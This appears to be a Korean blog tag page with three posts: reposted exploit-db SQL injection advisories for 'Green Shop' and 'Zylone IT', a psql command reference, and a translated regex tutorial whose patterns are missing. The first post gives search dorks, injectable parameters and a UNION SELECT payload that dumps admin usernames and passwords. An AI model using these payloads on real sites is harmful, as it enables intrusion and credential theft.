'Username'에 해당되는 글 3건

  1. 2010.07.08 SQL Injection Vulnerability
  2. 2010.02.18 PostgreSQL 기본 클라이언트 psql 사용
  3. 2009.09.30 웹개발 유용한 정규식 표현 8가지 (1)
2010.07.08 18:23

SQL Injection Vulnerability

SQL Injection Vulnerabilities Green Shop
  
[x] Tybe: SQL Injection Vulnerabilities
[x] Vendor: egreen.ir
[x] Script Name: Green Shop
[x] author: Ashiyane Digital Security Team
[x] Thanks To N4H
[?] Submit By PrinceofHacking ^_^
[x] Mail : Prince[dot]H4ck@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
D0rk: "egreen.ir"
 
Exploit:
http://site.org/index.php?pid=[SQLi]
 
Ex:
http://site.org/index.php?pid=77/**/Union/**/SELECT/**/Group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/admins/**/--
 
Login Page :
http://site.org/admin/login.php
 
Special Tnx : All Ashiyane Members


Zylone IT Multiple Blind SQL Injection Vulnerability

# Exploit Title: Zylone IT Multiple Blind SQL Injection Vulnerability
# Date: 2010-07-08
# Author: Callo
# Software Link: http://www.zylone.com/
# Version: Unknown
# Tested on: php
  
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Title: Zylone IT Multiple Blind SQL Injection Vulnerability               0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Date: 2010-07-07                                                          0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Author: Callo                                                             0
0 ~# Home: www.gsk2.org                                                        1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Software Link: http://www.zylone.com/                                     1
1 ~# Version: Unknow
0 ~# Tested on: php                                                            1
1 ~# Dork: Powered by Zylone IT                                                0
0          Powered By: Zylone IT                                               1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Exploit: http://localhost/[PATH]/news_details.php?news_id=[BLIND SQLi]    1
1             http://localhost/[PATH]/news.php?cat_id=[BLIND SQLi]             0
0             http://localhost/[PATH]/news_details.php?sec_id=[BLIND SQLi]     1
1             http://localhost/[PATH]/home.php?page_id=[BLIND SQLi]            0
0             http://localhost/[PATH]/events.php?cat_id=[BLIND SQLi]           1
1             http://localhost/[PATH]/policy.php?sec_id=[BLIND SQLi]           0
0                                                                              1
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Greetz: Whivack                                                           1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101


출처 : exploit-db.com

Trackback 1 Comment 0
2010.02.18 18:48

PostgreSQL 기본 클라이언트 psql 사용

psql 쉘 옵션

[root@linux root]# psql --help 
This is psql 7.4.1, the PostgreSQL interactive terminal. 
 
Usage: 
  psql [OPTIONS]... [DBNAME [USERNAME]] 
 
General options: 
  -d DBNAME       specify database name to connect to (default: "root") 
  -c COMMAND      run only single command (SQL or internal) and exit 
  -f FILENAME     execute commands from file, then exit 
  -l              list available databases, then exit 
  -v NAME=VALUE   set psql variable NAME to VALUE 
  -X              do not read startup file (~/.psqlrc) 
  --help          show this help, then exit 
  --version       output version information, then exit 
 
Input and output options: 
  -a              echo all input from script 
  -e              echo commands sent to server 
  -E              display queries that internal commands generate 
  -q              run quietly (no messages, only query output) 
  -o FILENAME     send query results to file (or |pipe) 
  -n              disable enhanced command line editing (readline) 
  -s              single-step mode (confirm each query) 
  -S              single-line mode (end of line terminates SQL command) 
 
Output format options: 
  -A              unaligned table output mode (-P format=unaligned) 
  -H              HTML table output mode (-P format=html) 
  -t              print rows only (-P tuples_only) 
  -T TEXT         set HTML table tag attributes (width, border) (-P tableattr=) 
  -x              turn on expanded table output (-P expanded) 
  -P VAR[=ARG]    set printing option VAR to ARG (see \pset command) 
  -F STRING       set field separator (default: "|") (-P fieldsep=) 
  -R STRING       set record separator (default: newline) (-P recordsep=) 
 
Connection options: 
  -h HOSTNAME     database server host or socket directory (default: "local socket") 
  -p PORT         database server port (default: "5432") 
  -U NAME         database user name (default: "root") 
  -W              prompt for password (should happen automatically) 
 
For more information, type "\?" (for internal commands) or "\help" 
(for SQL commands) from within psql, or consult the psql section in 
the PostgreSQL documentation. 
 
Report bugs to <pgsql-bugs@postgresql.org>. 
 
-d DBNAME 사용할 DB를 선택한다 (기본적으로 사용자의 ID이다. 이 문서에서는 root
-c COMMAND -c "SQL" 형식으로 한개의 쿼리만을 처리한 후 종료한다.
-f FILENAME 파일 내의 SQL을 처리한 후 종료한다.
-l DB의 목록을 표시한 후 종료한다. (psql 사용시 \l 과 동일)
-h HOSTNAME 원격 호스트로 접속한다. (pg_hba.conf 에 대한 문서는 나중에..)
-p POST pgsql 서버의 포트
-U NAME 접근할 사용자 이름
  • 대충 이정도가 그나마 많이 사용되는 옵션이다. 자세한 내용은 --help 하면 나옵니다


많이 사용되는 명령어

\d 테이블, 인덱스, 시퀀스, 뷰의 목록이 표시된다. (\d+ 하면 각 테이블의 코멘트가 표시된다.)
\dt {TABLENAME} 테이블 목록이 표시된다. (\dt+ 하면 각 테이블과 필드의 코멘트가 표시된다.)
\di {INDEXNAME} 인덱스 목록이 표시된다. (\di+ 하면 각 인덱스의 코멘트가 표시된다.)
\ds {SEQUENCENAME} 시퀀스 목록이 표시된다. (\ds+ 하면 각 시퀀스의 코멘트가 표시된다.)
\dv {VIEWNAME} 뷰 목록이 표시된다. (\dv+ 하면 각 뷰와 필드의 코멘트가 표시된다.)
\dn {SCHEMANAME} 스키마 목록이 표시된다. (최근에 추가된 개념이다. 오라클의 네임스페이스와 비슷하다.)
\du {USERNAME} 사용자 목록이 표시된다.
\l DB 목록이 표시된다. (\l+ 하면 각 DB의 코멘트가 표시된다.)
\i FILENAME 파일 내의 SQL을 처리한다.
\c DBNAME {USERNAME} 다른 DB에 접속한다. 사용자 이름을 바꿔 접속 할 수 있다.
\q 종료 (중요하다. 처음에 몰라서 버벅댔다. 참고로 컨트롤C 안먹는다 -_-;)


일반
  \c[onnect] [DBNAME|- USER|- HOST|- PORT|-]
                 새 데이터베이스로 접속 (현재: "gsimplexi")
  \cd [DIR]      현재 작업 디렉토리를 바꿈
  \copyright     PostgreSQL 사용 배포 규약을 보여줌
  \encoding [ENCODING]
                 클라이언트 인코딩을 보거나 지정
  \h [NAME]      NAME SQL 명령어 도움말을 보여줌, 모든 명령어: *
  \prompt [TEXT] NAME
                 prompt user to set internal variable
  \password [USERNAME]
                 securely change the password for a user
  \q             psql 마침
  \set [NAME [VALUE]]
                 내장 변수를 지정, 또는 인자가 없으면 보기
  \timing        명령 실행 시간 보이기 (현재 꺼짐)
  \unset NAME    내장변수(internal variable) 해제
  \! [COMMAND]   쉘 명령 실행

쿼리 버퍼
  \e 파일이름    현저 쿼리 버퍼나 지정한 파일을 외부 편집기로 편집함
  \g [FILE]      쿼리 버퍼 내용을 서버로 보내고 ([FILE]에 그 결과값을 쓰거나| 파이프로 보냄
  \p             현재 쿼리 버퍼의 내용을 보여줌
  \r             쿼리 버퍼 초기화 (모두 지움)
  \s [FILE]      history 나 [FILE]에 저장된 history 보여줌
  \w FILE        현재 쿼리 버퍼 내용을 FILE 파일로 씀

입력/출력
  \echo [STRING] 표준출력으로 지정한 STRING 출력
  \i FILE        지정한 FILE 파일로부터 명령 실행
  \o FILE        모든 쿼리 결과를 지정한 FILE 파일로 보냄, 또는 |파이프로
  \qecho [STRING]
                 퀴리 출력 스트림에 [STRING] 씀 (\o 명령 참조)

정보보기
  \d [NAME]     table, view, index, sequence 정보 보기
  \d{t|i|s|v|S} [PATTERN] ("+" 추가하면 보다 자세히)
                 tables/indexes/sequences/views/system tables 목록 보기
  \da [PATTERN]  통계 함수들 목록
  \db [PATTERN]  테이블스페이스 목록 ("+" 추가하면 보다 자세히)
  \dc [PATTERN]  문자코드변환규칙(converson) 목록
  \dC            형변환자 목록
  \dd [PATTERN]  객체를 위한 코멘트 보기
  \dD [PATTERN]  도메인 목록
  \df [PATTERN]  함수 목록 ("+" 추가하면 보다 자세히)
  \dF [PATTERN]  list text search configurations (add "+" for more detail)
  \dFd [PATTERN] list text search dictionaries (add "+" for more detail)
  \dFt [PATTERN] list text search templates
  \dFp [PATTERN] list text search parsers (add "+" for more detail)
  \dg [PATTERN]  그룹 목록
  \dn [PATTERN]  스키마 목록 ("+" 추가하면 보다 자세히)
  \do [NAME]     연산자 목록
  \dl            large object 목록, \lo_list 명령과 같음
  \dp [PATTERN]  테이블,뷰,시퀀스의 접근 권한 목록
  \dT [PATTERN]  자료형 목록 ("+" 추가하면 보다 자세히)
  \du [PATTERN]  사용자 목록
  \l             모든 데이터베이스 목록("+" 추가하면 보다 자세히)
  \z [PATTERN]   테이블, 뷰, 시퀀스 접근권한 목록 (\dp 명령과 같음)

출력양식
  \a             출력물 정렬 형태를 전환함
  \C [STRING]    테이블 제목을 지정함, STRING 값이 없으면 제목 지움
  \f [STRING]    필드 구분자를 STRING으로 지정함
  \H             HTML 출력 모드 전환 (현재 꺼짐)
  \pset NAME [VALUE]
                 테이블 출력 속성 지정
                 (NAME := {format|border|expanded|fieldsep|footer|null|
                 numericlocale|recordsep|tuples_only|title|tableattr|pager})
  \t             테이블 필드명 보이기 전환 (현재 꺼짐)
  \T [STRING]    HTML <table> 태그 속정 지정, 없으면 지움
  \x             확장된 출력 모드 전환 (현재 꺼짐)

Large object 복사
  \copy ...      SQL COPY 명령과 같음
  \lo_export LOBOID FILE
  \lo_import FILE [COMMENT]
  \lo_list
  \lo_unlink LOBOID    large object 처리명령들


출처 : http://www.joinc.co.kr


Trackback 2 Comment 0
2009.09.30 09:46

웹개발 유용한 정규식 표현 8가지

Background Info on Regular Expressions

This is what Wikipedia has to say about them:

In computing, regular expressions provide a concise and flexible means for identifying strings of text of interest, such as particular characters, words, or patterns of characters. Regular expressions (abbreviated as regex or regexp, with plural forms regexes, regexps, or regexen) are written in a formal language that can be interpreted by a regular expression processor, a program that either serves as a parser generator or examines text and identifies parts that match the provided specification.

Now, that doesn't really tell me much about the actual patterns. The regexes I'll be going over today contains characters such as \w, \s, \1, and many others that represent something totally different from what they look like.

If you'd like to learn a little about regular expressions before you continue reading this article, I'd suggest watching the Regular Expressions for Dummies screencast series.

The eight regular expressions we'll be going over today will allow you to match a(n): username, password, email, hex value (like #fff or #000), slug, URL, IP address, and an HTML tag. As the list goes down, the regular expressions get more and more confusing. The pictures for each regex in the beginning are easy to follow, but the last four are more easily understood by reading the explanation.

The key thing to remember about regular expressions is that they are almost read forwards and backwards at the same time. This sentence will make more sense when we talk about matching HTML tags.

Note: The delimiters used in the regular expressions are forward slashes, "/". Each pattern begins and ends with a delimiter. If a forward slash appears in a regex, we must escape it with a backslash: "\/".

Matching a Username

Pattern:

Description:

We begin by telling the parser to find the beginning of the string (^), followed by any lowercase letter (a-z), number (0-9), an underscore, or a hyphen. Next, {3,16} makes sure that are at least 3 of those characters, but no more than 16. Finally, we want the end of the string ($).

String that matches:

my-us3r_n4m3

String that doesn't match:

th1s1s-wayt00_l0ngt0beausername (too long)

Matching a Password

Pattern:

Description:

Matching a password is very similar to matching a username. The only difference is that instead of 3 to 16 letters, numbers, underscores, or hyphens, we want 6 to 18 of them ({6,18}).

String that matches:

myp4ssw0rd

String that doesn't match:

mypa$$w0rd (contains a dollar sign)

Matching a Hex Value

Pattern:

Description:

We begin by telling the parser to find the beginning of the string (^). Next, a number sign is optional because it is followed a question mark. The question mark tells the parser that the preceding character — in this case a number sign — is optional, but to be "greedy" and capture it if it's there. Next, inside the first group (first group of parentheses), we can have two different situations. The first is any lowercase letter between a and f or a number six times. The vertical bar tells us that we can also have three lowercase letters between a and f or numbers instead. Finally, we want the end of the string ($).

The reason that I put the six character before is that parser will capture a hex value like #ffffff. If I had reversed it so that the three characters came first, the parser would only pick up #fff and not the other three f's.

String that matches:

#a3c113

String that doesn't match:

#4d82h4 (contains the letter h)

Matching a Slug

Pattern:

Description:

You will be using this regex if you ever have to work with mod_rewrite and pretty URL's. We begin by telling the parser to find the beginning of the string (^), followed by one or more (the plus sign) letters, numbers, or hyphens. Finally, we want the end of the string ($).

String that matches:

my-title-here

String that doesn't match:

my_title_here (contains underscores)

Matching an Email

Pattern:

Description:

We begin by telling the parser to find the beginning of the string (^). Inside the first group, we match one or more lowercase letters, numbers, underscores, dots, or hyphens. I have escaped the dot because a non-escaped dot means any character. Directly after that, there must be an at sign. Next is the domain name which must be: one or more lowercase letters, numbers, underscores, dots, or hyphens. Then another (escaped) dot, with the extension being two to six letters or dots. I have 2 to 6 because of the country specific TLD's (.ny.us or .co.uk). Finally, we want the end of the string ($).

String that matches:

john@doe.com

String that doesn't match:

john@doe.something (TLD is too long)

Matching a URL

Pattern:

Description:

This regex is almost like taking the ending part of the above regex, slapping it between "http://" and some file structure at the end. It sounds a lot simpler than it really is. To start off, we search for the beginning of the line with the caret.

The first capturing group is all option. It allows the URL to begin with "http://", "https://", or neither of them. I have a question mark after the s to allow URL's that have http or https. In order to make this entire group optional, I just added a question mark to the end of it.

Next is the domain name: one or more numbers, letters, dots, or hypens followed by another dot then two to six letters or dots. The following section is the optional files and directories. Inside the group, we want to match any number of forward slashes, letters, numbers, underscores, spaces, dots, or hyphens. Then we say that this group can be matched as many times as we want. Pretty much this allows multiple directories to be matched along with a file at the end. I have used the star instead of the question mark because the star says zero or more, not zero or one. If a question mark was to be used there, only one file/directory would be able to be matched.

Then a trailing slash is matched, but it can be optional. Finally we end with the end of the line.

String that matches:

http://net.tutsplus.com/about

String that doesn't match:

http://google.com/some/file!.html (contains an exclamation point)

Matching an IP Address

Pattern:

Description:

Now, I'm not going to lie, I didn't write this regex; I got it from here. Now, that doesn't mean that I can't rip it apart character for character.

The first capture group really isn't a captured group because

was placed inside which tells the parser to not capture this group (more on this in the last regex). We also want this non-captured group to be repeated three times — the {3} at the end of the group. This group contains another group, a subgroup, and a literal dot. The parser looks for a match in the subgroup then a dot to move on.

The subgroup is also another non-capture group. It's just a bunch of character sets (things inside brackets): the string "25" followed by a number between 0 and 5; or the string "2" and a number between 0 and 4 and any number; or an optional zero or one followed by two numbers, with the second being optional.

After we match three of those, it's onto the next non-capturing group. This one wants: the string "25" followed by a number between 0 and 5; or the string "2" with a number between 0 and 4 and another number at the end; or an optional zero or one followed by two numbers, with the second being optional.

We end this confusing regex with the end of the string.

String that matches:

73.60.124.136 (no, that is not my IP address :P)

String that doesn't match:

256.60.124.136 (the first group must be "25" and a number between zero and five)

Matching an HTML Tag

Pattern:

Description:

One of the more useful regexes on the list. It matches any HTML tag with the content inside. As usually, we begin with the start of the line.

First comes the tag's name. It must be one or more letters long. This is the first capture group, it comes in handy when we have to grab the closing tag. The next thing are the tag's attributes. This is any character but a greater than sign (>). Since this is optional, but I want to match more than one character, the star is used. The plus sign makes up the attribute and value, and the star says as many attributes as you want.

Next comes the third non-capture group. Inside, it will contain either a greater than sign, some content, and a closing tag; or some spaces, a forward slash, and a greater than sign. The first option looks for a greater than sign followed by any number of characters, and the closing tag. \1 is used which represents the content that was captured in the first capturing group. In this case it was the tag's name. Now, if that couldn't be matched we want to look for a self closing tag (like an img, br, or hr tag). This needs to have one or more spaces followed by "/>".

The regex is ended with the end of the line.

String that matches:

<a href="http://net.tutsplus.com/">Nettuts+</a>

String that doesn't match:

<img src="img.jpg" alt="My image>" /> (attributes can't contain greater than signs)


원문 : http://net.tutsplus.com/tutorials/other/8-regular-expressions-you-should-know/


Trackback 2 Comment 1
  1. 2009.09.30 13:36 address edit & del reply

    비밀댓글입니다